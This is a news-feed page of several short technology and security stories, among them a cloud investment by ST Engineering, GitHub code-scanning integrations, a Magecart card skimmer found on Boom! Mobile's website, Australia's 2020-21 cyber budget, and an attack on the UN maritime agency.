Information Technology

ST Engineering has beefed up its cloud services portfolio via an investment in CloudSphere, a US-based cloud management and governance vendor. Made through its venture capital arm ST Engineering Ventures, the investment will see the Singapore company expand its current cloud services beyond assessment and migration. 
The investment round was made alongside growth equity tech fund, Atlantic Bridge Capital, and would provide ST Engineering “direct access” to hybrid and multi-cloud management and government software and services, the Singapore company said in a statement Tuesday. It added that the investment was part of the organisation’s efforts to drive its capabilities in professional and management services in public cloud. 
ST Engineering is a technology, defence, and engineering group focusing on the aerospace, electronics, land systems, and marine sectors. It VC arm invests in startups in high growth areas such as robotics, autonomous technology, and cybersecurity. 
ST Engineering’s president of electronics sector Ravinder Singh noted that enterprises operating in hybrid and multi-cloud environments were using many different sets of tools, including in resource provisioning and monitoring, cost reporting, and security, as well as identity dashboards with multiple, disparate control planes. 
ST Engineering’s investment in CloudSphere would afford its customers “greater visibility and control” of their multi-cloud inventory, performance, and costs, Singh said. This expansion of its managed services portfolio would enable ST Engineering to tap opportunities with cloud technology, he added.
Amongst CloudSphere’s offerings is its flagship cloud governance platform, which allows customers to manage public cloud deployments with automation tools. 
ZDNet asked ST Engineering several questions including the growth rate of its cloud services and how much it invested in CloudSphere. This article will be updated when the company responds. 
RELATED COVERAGE More

GitHub has released a host of third-party security tools for its just-launched code-scanning feature, which helps open-source projects nix security bugs before they hit production code. 
GitHub Code Scanning works on top of CodeQL (Query Language), a technology that GitHub integrated into its platform after it acquired code-analysis platform Semmle in September 2019. GitHub announced general availability of code scanning last week after a beta phase that’s run since May.   

GitHub has now introduced 10 new third-party code-scanning tools that are available with GitHub code scanning to allow developers to remove flaws before they’re committed to code. 
The ability to add third-party tools to the native GitHub code-scanning feature lets developers customize it for different teams in an organization. 
Extensibility is enabled via code scanning’s application protocol interface endpoint, which ingests the results of scans from third-party tools using the Static Analysis Results Interchange Format (SARIF).
GitHub sees it being valuable for organizations post-merger with teams running different code-scanning tools, as well as for extending coverage to mobile, Salesforce development or mainframe development. It also enables customized reporting and dashboards. 
The new third-party scanning tools include extensions for static analysis and developer security training. 
The current roster includes Checkmarx, Codacy, CodeScan, DefenseCode ThunderScan, Fortify on Demand, Muse, Secure Code Warrior, Synopsys Intelligent Security Scan, Veracode Static Analysis, and Xanitizer.   
Developers can begin using third-party scanning tools with GitHub Actions, a feature that allows users to automate development workflows, or a GitHub App based on an event, such as a pull request. 
GitHub then handles the rest of the task, ensuring there are no duplicates and that alerts are aggregated and associated with each tool that generates a report. 
“The results are formatted as SARIF and uploaded to the GitHub Security Alerts tab. Alerts are then aggregated per tool and GitHub is able to track and suppress duplicate alerts,” explains Jose Palafox of GitHub. 
“This allows developers to use their tool of choice for any of their projects on GitHub, all within the native GitHub experience.” 
The third-party scanners are available on GitHub’s marketplace. 
During the beta, GitHub says code scanning was used to perform more than 1.4 million scans on more than 12,000 repositories. It’s helped identify over 20,000 vulnerabilities.

Open Source More

Mandiant has launched Mandiant Advantage: Threat Intelligence, a software-as-a-service (SaaS) platform designed for security response teams. 

Announced on Tuesday, the FireEye-owned cyberforensics firm said the new solution is the first SaaS offering in its portfolio and will combine threat intelligence gathered by Mandiant together with data from cyber incident response engagements. 
See also: Former Amazon finance manager and family charged with $1.4m insider trading scheme
Delivered through a one-stop-shop platform, Mandiant Advantage: Threat Intelligence leans on real-time information collected by over 300 researchers and analysts.
“By extending this timely look into what’s happening across multiple Mandiant frontlines, organizations can more easily prioritize the threats that matter to them most right now,” the company said.
Over time, more Mandiant Advantage SaaS products will be developed to “to augment and automate global security teams with controls-agnostic, actionable breach, adversary, operational and machine intelligence data.”
CNET: Browser privacy boost: Here are the settings to change in Chrome, Firefox, Safari, Edge and Brave
Planned upgrades include validation on demand — potentially including checks for email filter rules, database configuration, and operating system controls and updates — as well as malware analysis as a service.
Mandiant Advantage: Threat Intelligence is subscription-based and is priced depending on the size of the organization signing up. In addition, the solution includes API integration and a browser plugin. 
“We are now making emerging intelligence accessible to all defenders as it is discovered, regardless of the technology they have deployed,” Sandra Joyce, executive VP of Mandiant Threat Intelligence at FireEye commented. “Now customers of all sizes have unprecedented access to the depth and breadth of threat intelligence Mandiant offers, appropriate to their budget and unique needs.”
TechRepublic: Account takeover fraud rates skyrocketed 282% over last year
Mandiant Solutions was launched in April this year in order to streamline FireEye and Mandiant’s portfolio. Now, the term brings Mandiant Consulting, Mandiant Managed Defense, FireEye Threat Intelligence, FireEye Expertise On Demand, and Mandiant Security Validation under the same umbrella — together with the firm’s latest cybersecurity offering. 

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

F5 Networks on Tuesday introduced Shape AI Fraud Engine (SAFE), a new SaaS offering that promises to eliminate fraudulent online transactions that can sometimes bypass other security and fraud detection controls.

Leveraging technology from its $1 billion acquisition of Shape Security earlier this year, F5’s SAFE service evaluates online transactions via AI in order to understand user intent and block potential fraud before it occurs. The product marks F5’s first real push into the fraud market since acquiring Shape Security, the company said.
Following its acquisition of Shape Security, F5 has integrated Shape’s capabilities into its portfolio of application security services, with F5 serving as a traffic flow insertion point for Shape’s online fraud and abuse prevention solutions. F5’s app security services specialize in protecting applications across multi-cloud environments.
“The need for innovation in fraud prevention becomes more urgent when you factor in the accelerated shift to online channels driven by the current global health situation,” said Sumit Agarwal, VP of analytic products at F5, and co-founder of Shape. “We’re seeingfraudsters launch increasingly sophisticated attacks that take advantage of COVID-driven shifts and overall economic distress.”
Earlier this year F5 announced series of new multi-cloud application security services, including a service that brought its Web Application Firewall (WAF) technology to the NGINX platform stemming from the company’s acquisition of NGINX. 
The acquisitions of Shape Security and NGINX and recent product launches have allowed F5 to reframe its approach to security with a focus on four key areas: application layer security, trusted application access, application infrastructure security and intelligent threat services. The Shape AI Fraud Engine fits into this approach and gives F5 an entry point into the fraud prevention market. The service is available now. More

External hard drives are a great backup and portable storage solution, but if they are used to store sensitive data, they can quickly become a huge security headache.
While there is no end of external storage drives that come with software encryption solutions, but there are far from ideal in situations where security is a must.
Not only do you need the encryption/decryption software installed on all the devices you want to hook up the external drive to, but you better hope that there’s a version available for the platform you’re using. You’re probably going to be in luck if you’re running the latest version of Windows or Mac, but if you happen to run an older version of an OS, or something more exotic like Linux or Android, or perhaps an embedded system, then a software-based solution is likely to steer you into the tarpits.
This is why I like hardware solutions such as the Apricorn Aegis Padlock DT drive.
Must read: iPhone battery bad after installing iOS 14? Apple offers some help

I reviewed an Aegis Padlock DT drive a couple of years ago, and I still use one for long-term storage of sensitive data. Back then, the upper storage limit on the drive was 12TB.
12TB is a lot, but Apricorn realized that some people have greater storage needs, and have expanded the line to include 18TB of storage.
Apart from featuring the largest encrypted external USB storage capacity in its class, the Aegis Padlock DT drives offer nine capacities of secure storage, ranging from 2TB to 18TB. The drive features 256-bit AES XTS hardware-based encryption and has a polymer-coated wear-resistant on-board keypad for quick PIN authentication.
The drive’s firmware is also locked to prevent tampering with it, which Apricorn claims make its products resistant to attacks such as BadUSB.
On the connectivity front, The Aegis Padlock DT uses ultra-fast USB 3.2 Gen 1 (3.0) data transfer speeds, and all data is encrypted on the fly as it’s being written to the drive, with the devices’ PINs and data remain encrypted when the drives are at rest.
The drive is also crammed with security features, from brute-force protection, unattended auto-lock, separate admin and user modes, and even a self-destruct mode (the drive doesn’t explode, it just returns to the factory mode and looks like it hasn’t been set up).
“The Padlock DT FIPS are secure, easy to use drives for organizations that want to ensure their sensitive data is secure at all times. As ransomware continues to be one of the most dominant cyber threats organizations’ face, businesses must back up their data and store it disconnected from the network to enable fast recovery in the event of a cyber-attack whilst encrypting it to comply with data protection legislation,” said Jon Fielding, Managing Director, EMEA Apricorn. “Adding the 18TB drive to our product set provides businesses increased storage capabilities and the assurance that should they be targeted, they can thwart ransomware attempts with a secure encrypted data backup,” Fielding added.
The Apricorn Aegis Padlock DT is a solid, reliable, well-constructed storage solution for those looking for robust, secure storage. More

A mobile network operator has fallen victim to a Magecart campaign designed to steal consumer financial data. 

Malwarebytes researchers said on Monday that one of the latest organizations targeted by a Magecart group is Boom! Mobile, of which the firm’s US website has been compromised and is, at the time of writing, actively being used to harvest shopper information. 
The researchers said that Boom!, a mobile operator that claims transparency and ease-of-use as their main selling points, has so far not responded to efforts to wipe out the Magecart infection. 
Magecart is an umbrella term describing credit-card skimmer attacks and numerous cyberthreat groups that now specialize in this area. Typically, attacks are performed by exploiting a vulnerability in a website domain — including back-end content management systems (CMS) — in order to load JavaScript-based scripts able to skim data.
See also: Today’s ‘mega’ data breaches now cost companies $392 million to recover from
In order to avoid detection for as long as possible, threat actors may limit the injection of skimmer code to payment portal pages. 
Once card data has been stolen and whisked away to an attacker-controlled command-and-control server (C2), this information can be sold on in bulk, used to create clone cards, or to conduct fraudulent purchases.  
Previous victims of Magecart attacks include Ticketmaster and British Airways.
Malwarebytes says that in Oklahoma-based Boom! Mobile’s case, one of the cybersecurity firm’s crawlers found a one-line code injection containing a Base64 encoded URL leading to an external JavaScript library.
Once decoded, the URL loads a script disguised as a Google Analytics element while using the link paypal-debit[.]com/cdn/ga.js.
CNET: Huawei ban timeline: UK finds flaw of ‘national significance’ in Huawei tech
“We quickly recognize this code as a credit card skimmer that checks for input fields and then exfiltrates the data to the criminals,” the researchers said. 
The skimmer itself, however, is far from quiet. Rather than silently grab a large swathe of data and send it in one go, data is exfiltrated every time changes are detected in fields on a page — such as those used to input card details. The team noted that each leak can be viewed as a separate GET request.
It is possible that the website’s compromise was due to the use of an old version of PHP that is no longer supported. 
The group believed to be responsible relates to Fullz House, who have been previously traced to Magecart attacks using the same malicious domain and code. Fullz is a slang term used to describe data dumps containing ‘full’ stolen personally identifiable information (PII) and payment card data.  
TechRepublic: Top 5 things to know about Confidential Computing
RiskIQ published a report on Fullz House, also tracked as Magecart Group 4, in 2019. The group has diversified into both phishing and card-skimming campaigns but overlaps in domain and IP infrastructure have allowed researchers to connect the dots. In September, new fraudulent domains were registered by the group.
Malwarebytes has reported the active infection to the mobile service provider via live chat and email, but as of now, the company has not responded. 
“Their website is still compromised and online shoppers are still at risk,” the team added. 
ZDNet has reached out to Boom! Mobile for comment and will update when we hear back. 

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

(Image: APH)
If there is one word to sum up the Australian Budget of 2020-21, it is pre-announced.

As far back as June, it’s been possible to see the framework that the government has used for its cyber announcements, at the time announcing AU$1.35 billion for its Cyber Enhanced Situational Awareness and Response (CESAR) package.
By August, another AU$320 million was kicked in via the 2020 Cyber Security Strategy to take the total to the AU$1.7 billion — the figure being thrown about with maddening glee in the papers.  
One of the rare notable pieces of funding was the fulfilment of the wish from the Commonwealth Ombudsman for more funding.
“The government will provide AU$1.6 million in 2020-21 (including $0.9 million in capital funding) to the Office of the Commonwealth Ombudsman to ensure that it can effectively oversee the use of the new Telecommunications and other Legislation Amendment (Assistance and Access) Act 2018 by law enforcement agencies,” the Budget papers stated.
“This measure will be offset by redirecting funding from the Department of Home Affairs.”
The irony is Ombudsman Michael Manthorpe was looking for funding to handle the proposed Telecommunications Legislation Amendment (IPO) Bill 2020 that would allow for Australia to work towards a bilateral agreement with the United States in order to implement the US CLOUD Act.
Entering into a bilateral CLOUD Act agreement would enable Australian law enforcement to serve domestic orders for communications data needed to combat serious crime directly on US-based companies, and vice versa.  
“If passed, the IPO Bill will make it easier for law enforcement agencies to obtain certain electronic information under proposed and future bilateral or multilateral agreements, when compared to current mutual legal assistance arrangements,” Manthorpe wrote at the time.
“On this basis, I anticipate that not only will the number of inspections my office is required to perform increase, but so too will the volume of electronic information accessed by Australian law enforcement agencies which my staff will need to asses.”
Elsewhere in the Budget papers, AU$12.7 million has been set aside for an Australia-India cyber and critical technology partnership as part of a AU$62 million plan across four years to “support the Comprehensive Strategic Partnership with India”, which includes AU$19.5 million to focus on science, technology, and innovation. This announcement was made on June 4.
The government also said it would spend AU$222 million over four years with AU$22.3 million ongoing to improve and modernise the IT systems and business practices related to export regulations in the agricultural sector. The money will go towards “simplifying interactions between farmers and exporters and the Department of Agriculture, Water and the Environment”, integrating systems to lower “regulatory burden”, as well as “mitigating export system outages and improving the cybersecurity of information”.
AU$4.9 million will also be spent across two years to “build, consolidate, and strengthen cybersecurity capability in the energy sector”, which is in addition to the AU$4.7 million that will be spent in 2020-21 on the Australian Sports Foundation to help the fundraising of community sports clubs and boost the network and cyber functions of the organisation.
Across the Cyber Security Strategy, AU$21 million will be spent in 2020-21, AU$43 million will follow in 2021-22, a further AU$37.3 million will appear in 2022-23, and AU$48 million is allocated for 2023-24. This brings the noted allocations to just over AU$149 million across the forward estimates.
Of that, the Australian Signals Directorate will lose AU$10.7 million in 2020-21, followed by AU$10.8 million of funding related to the strategy in 2021-22, and AU$11 million for 2022-23. No funding is allocated for 2023-24.
Across the four years, the Australian Federal Police will get almost AU$90 million, Home Affairs will get AU$54.2 million related to the strategy, and the Department of Industry, Science, Energy, and Resources will get AU$37.7 million.
The Budget papers stated the $1.4 billion in funding for CESAR will be spent over a decade, and that it would be offset by pulling funding from elsewhere within Defence. 
The papers also stated the Office of the eSafety Commissioner would receive AU$39.4 million over three years to “continue its work keeping Australian families safe”.
“The additional funding will enable the Office of the eSafety Commissioner to respond to a sustained increase in demand for its existing programs and fulfil additional functions and responsibilities, including overseeing a new adult cyber abuse takedown scheme under the new Online Safety Act.”

Australian Budget 2020 More

Image: UN

Special feature

Cyberwar and the Future of Cybersecurity
Today’s security threats have expanded in scope and seriousness. There can now be millions — or even billions — of dollars at risk when information security isn’t handled properly.
Read More

The United Nations International Maritime Organization (UN IMO) disclosed a security breach over the weekend that the agency categorized as a “sophisticated cyber-attack” against its IT systems.
The incident was discovered on Thursday and impacted the IMO public website and other web-based services, the UN agency said in a press release.
Email systems, its virtual conferencing platform, along with other internal and external collaboration platforms, were unaffected, an IMO spokesperson said.
Affected systems were taken down and then restored by Friday, October 2.
The agency said the attack “overcame robust security measures” it had in place to protect its IT systems.
“The IMO Headquarters file servers are located in the UK, with extensive backup systems in Geneva. The backup and restore system is regularly tested,” the agency said.
“Following the attack, the Secretariat shut down key systems to prevent further damage from the attack. The Secretariat is working with international security experts to restore systems as soon as possible, to identify the source of the attack, and further enhance security systems to prevent recurrence.”
An IMO spokesperson acknowledged a request for comment from ZDNet but did not return an email seeking for more details about the nature of the cyberattack.
It is unclear if the IMO was hit by ransomware, a website defacement, or its website was used for a watering hole attack, a type of attack where hackers host malicious code on the IMO website in an attempt to trick IMO members and visitors into downloading and infecting themselves with malware.
The IMO is the UN organization that issues international guidance on shipping, passenger ships, maritime security, and maritime environmental protection. Due to its central role in international rule-making, it is a highly important organization that often sets international policies in regard to the entire maritime field. More